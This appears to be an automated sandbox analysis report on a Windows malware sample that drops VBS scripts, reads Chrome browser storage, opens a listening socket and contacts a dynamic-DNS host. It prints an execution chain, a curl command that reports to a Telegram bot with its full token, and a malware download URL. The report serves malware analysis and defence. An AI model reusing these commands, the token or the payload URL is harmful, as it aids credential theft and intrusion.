Source: C:\Users\user\AppData\Local\Temp\tmp.vbs Code function: 4_2_00007FF7B0AE2DD0 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 4_2_00007FF7B0AE2DD0
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs Code function: 4_2_00007FF7B0AE2FB4 SetUnhandledExceptionFilter, 4_2_00007FF7B0AE2FB4
Contains functionality to launch a program with higher privileges
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs Code function: 4_2_00007FF7B0ADADF0 EndDialog,SetDlgItemTextW,GetMessageW,IsDialogMessageW,TranslateMessage,DispatchMessageW,EndDialog,GetDlgItem,IsDlgButtonChecked,IsDlgButtonChecked,SetFocus,GetLastError,GetLastError,GetTickCount,GetLastError,GetCommandLineW,CreateFileMappingW,MapViewOfFile,ShellExecuteExW,WaitForInputIdle,Sleep,UnmapViewOfFile,CloseHandle,SetDlgItemTextW,SetDlgItemTextW,GetDlgItem,GetWindowLongPtrW,SetWindowLongPtrW,SetDlgItemTextW,IsDlgButtonChecked,SendDlgItemMessageW,GetDlgItem,IsDlgButtonChecked,GetDlgItem,SetDlgItemTextW,SetDlgItemTextW,DialogBoxParamW,EndDialog,EnableWindow,IsDlgButtonChecked,SetDlgItemTextW,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SendDlgItemMessageW,FindFirstFileW,FindClose,SendDlgItemMessageW,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn, 4_2_00007FF7B0ADADF0
Creates a process in suspended mode (likely to inject code)
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.CrypterX-gen.14448.17144.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c start C:\Users\user\AppData\Local\Temp\tmp.vbs Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Users\user\AppData\Local\Temp\tmp.vbs C:\Users\user\AppData\Local\Temp\tmp.vbs Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\RarSFX0\ping.vbs" Jump to behavior
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\RarSFX0\ping.bat" " Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\curl.exe curl "https://api.telegram.org/bot6745390378:AAE-OclYKCeZrtg1BPEW2LqGF2ln2iBb-Ow/sendMessage?chat_id=6915129246&text=Success" Jump to behavior
Contains functionality to query CPU information (cpuid)
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs Code function: 4_2_00007FF7B0AF5540 cpuid 4_2_00007FF7B0AF5540
Contains functionality to query locales information (e.g. system language)
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.CrypterX-gen.14448.17144.exe Code function: GetLocaleInfoEx,FormatMessageA, 0_2_00007FF7B329A04C
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs Code function: GetLocaleInfoW,GetNumberFormatW, 4_2_00007FF7B0AD9F2C
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.CrypterX-gen.14448.17144.exe Code function: 0_2_00007FF7B329B804 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter, 0_2_00007FF7B329B804
Source: C:\Users\user\AppData\Local\Temp\tmp.vbs Code function: 4_2_00007FF7B0AC4C24 GetVersionExW, 4_2_00007FF7B0AC4C24
Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior

Stealing of Sensitive Information
barindex
Tries to harvest and steal browser information (history, passwords, etc)
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.CrypterX-gen.14448.17144.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\000003.log Jump to behavior
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.CrypterX-gen.14448.17144.exe Code function: 0_2_00007FF7B3292524 socket,memset,htonl,setsockopt,bind,getsockname,listen,socket,connect,accept,getsockname,getpeername,closesocket,closesocket,closesocket,closesocket, 0_2_00007FF7B3292524
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.CrypterX-gen.14448.17144.exe Code function: 0_2_00007FF7B327BBA0 memset,strlen,memset,strlen,strncmp,strlen,strlen,strncmp,strlen,inet_pton,htons,inet_pton,htons,htons,bind,htons,bind,memset,getsockname,WSAGetLastError,WSAGetLastError, 0_2_00007FF7B327BBA0
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1416945 Sample: SecuriteInfo.com.Win64.Cryp... Startdate: 28/03/2024 Architecture: WINDOWS Score: 100 37 puredgb.duckdns.org 2->37 39 api.telegram.org 2->39 47 Multi AV Scanner detection for domain / URL 2->47 49 Antivirus detection for URL or domain 2->49 51 Multi AV Scanner detection for submitted file 2->51 57 4 other signatures 2->57 11 SecuriteInfo.com.Win64.CrypterX-gen.14448.17144.exe 1 2->11         started        signatures3 53 Uses dynamic DNS services 37->53 55 Uses the Telegram API (likely for C&C communication) 39->55 process4 dnsIp5 41 puredgb.duckdns.org 200.165.100.3, 30000, 49707 TelemarNorteLesteSABR Brazil 11->41 43 127.0.0.1 unknown unknown 11->43 35 C:\Users\user\AppData\Local\Temp\tmp.vbs, PE32+ 11->35 dropped 63 Potential malicious VBS script found (suspicious strings) 11->63 65 Tries to harvest and steal browser information (history, passwords, etc) 11->65 16 cmd.exe 1 11->16         started        file6 signatures7 process8 process9 18 tmp.vbs 3 10 16->18         started        21 conhost.exe 16->21         started        file10 33 C:\Users\user\AppData\Local\Temp\...\ping.vbs, ASCII 18->33 dropped 23 wscript.exe 1 18->23         started        process11 signatures12 59 Windows Scripting host queries suspicious COM object (likely to drop second stage) 23->59 61 Suspicious execution chain found 23->61 26 cmd.exe 1 23->26         started        process13 process14 28 curl.exe 1 26->28         started        31 conhost.exe 26->31         started        dnsIp15 45 api.telegram.org 149.154.167.220, 443, 49710 TELEGRAMRU United Kingdom 28->45
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
149.154.167.220
 api.telegram.org United Kingdom
62041 TELEGRAMRU false
200.165.100.3
 puredgb.duckdns.org Brazil
7738 TelemarNorteLesteSABR true

Private

IP
127.0.0.1

Contacted Domains

Name IP Active
puredgb.duckdns.org 200.165.100.3 true
api.telegram.org 149.154.167.220 true

Contacted URLs

Name Malicious Antivirus Detection Reputation
https://api.telegram.org/bot6745390378:AAE-OclYKCeZrtg1BPEW2LqGF2ln2iBb-Ow/sendMessage?chat_id=6915129246&text=Success false
    		high
    http://puredgb.duckdns.org:30000/xmg8oxqt/ping.exe false
    • 8%, Virustotal, Browse
    • Avira URL Cloud: malware
    		 unknown